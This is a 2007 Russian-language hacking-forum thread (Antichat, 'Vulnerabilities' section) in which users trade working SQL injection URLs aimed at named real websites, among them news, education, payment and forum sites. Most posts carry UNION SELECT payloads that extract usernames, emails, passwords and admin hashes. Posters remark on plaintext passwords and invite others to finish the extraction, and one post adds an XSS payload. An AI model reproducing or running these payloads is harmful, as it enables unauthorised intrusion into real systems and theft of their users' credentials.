ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3071  
Старый 10.09.2007, 22:16
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Биржа РаботЪ код: http://www.rubler.ru/users/user.phtml?id=-20+union+select+1,2,3,4,concat(login,char(58),emai l,char(58),password),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23+from+rf+limit+3691,1/* в бд 3691 юзер,пароли в открытом виде :wink:
 
Ответить с цитированием

  #3072  
Старый 11.09.2007, 07:46
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

Код:
http://buy-sell.in/fullnews.php?id=-1+union+select+1,email,3,4,password+from+members+limit+31,1/*
мускул 4, вход по имэйл, юзеров 31 =\
 
Ответить с цитированием

  #3073  
Старый 11.09.2007, 08:40
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

Код:
http://www.realkerala.in/detail.php?id=999+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(column_name,0x3a,table_name,0x3a),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+INFORMATION_SCHEMA.COLUMNS+limit+1,1/*/*
PR 4
 
Ответить с цитированием

  #3074  
Старый 11.09.2007, 09:34
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

красивый сайт
Код:
http://www.femina.in/viewpost.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71 ),0x71),3, 4,5,6,7,8,9,10,11,12,13,14,15/*
а форум еще лучше =)

Код:
http://www.femina.in/viewpost.php?id=-1+union+select+1,concat(username,0x3a,user_password,0x3a,user_email,0x3a, user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15+ from+phpbb_users+limit+1,1/*
 
Ответить с цитированием

edu.in
  #3075  
Старый 11.09.2007, 09:59
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию edu.in

Код:
http://www.vedanta.edu.in/page.php?id=-2+union+select+ 1,2,concat( user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14/*
табличка и колонка:
Код:
htp://www.vedanta.edu.in/page.php?id=-2+union+select+1,2,3,4,5,6,concat(column_name,0x3a,table_ name, 0 x3a),8,9,10,11,12,13,14+from+ INFORMATION_SCHEMA.COLUMNS+ lim it+160,1/*
а вот сами логин + хэш =)
Код:
http://www.vedanta.edu.in /page.php?id=-2+union+ select+1,2,username,4,5,6,password,8, 9,10,11,12,13,14+from+ admin/*
 
Ответить с цитированием

  #3076  
Старый 11.09.2007, 14:59
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

везде 4 мускл...

Цитата:
_htp://dostoevskij .karelia.ru/showarticle.phtml?id=-1 +union+select+1,concat(user(), 0x3a,version( ),0x3a,database() )/*
_htp://www.passi.eu/profil.php?id= -1+union+s elect+1,2,3,4,5,6,7,8,9,10,11,12,concat(user (),0x3a ,version(),0x3a,database() ),14,15,16,17,18/*
_htp://www.aktivungdom.eu/art/?id=9999+union+ select+1,2,3,concat(user(),0x3a,version( ),0x3a,database() ),5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27/*
_http://www .bsn.eu/main.php?id=-1+union+select+1,2,3,aes_decrypt (aes_encrypt(version(),0x 71),0x 71),5,6,7,8,9/*
 
Ответить с цитированием

  #3077  
Старый 11.09.2007, 20:13
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.ghost-bikes.com/2008/typ.php?bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33/*
вывод в пути к картинке
Цитата:
http://www.rosregistr.ru/index.php?menu=3010050000&id_part=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21
инжекты во всех параметрах =\

Последний раз редактировалось Spyder; 11.09.2007 в 20:20..
 
Ответить с цитированием

  #3078  
Старый 12.09.2007, 00:23
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

.EDU

красивая скуля, код:
http://webmaster.upi.edu/~ghmahendra/wap/newsdetail.php?id=-21+union+select+1,2,CAST(concat(column_name,char(5 8),table_name)+AS+BINARY),4+from+information_schem a.columns/*

нашел только это, код:

http://webmaster.upi.edu/~ghmahendra/wap/newsdetail.php?id=-21+union+select+1,2,concat(username,password),4+fr om+admina/* кто доработает?
 
Ответить с цитированием

  #3079  
Старый 12.09.2007, 14:49
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

https://ssl.paycash.ua/cgi-bin/error.cgi?code=-300%20union%20select%20'Это%20в<script>alert(" XSS")</script>ывод'
Нашел вот такую скулю (впервые в cgi скрипте). Единственное что придумал это ХСС. Извесны таблицы errors и partners. Больше вытянуть ничего не удалось. А может и нету тут нифига. Кто найдет, расскажите
 
Ответить с цитированием

  #3080  
Старый 13.09.2007, 00:46
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

А такие скули стоит выкладывать?


код:


http://wap.sarbc.ru/news/shownews.phtml?id=-71891+union+select+1,2,3,4,concat(char(58),char(58 ),char(58),char(58),char(58),name,char(58),passwd) ,6,7,8,9,10,11,12+from+user+limit+1,1/*

p.s At me today birthday

Последний раз редактировалось fobofob; 13.09.2007 в 01:00.. Причина: .
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ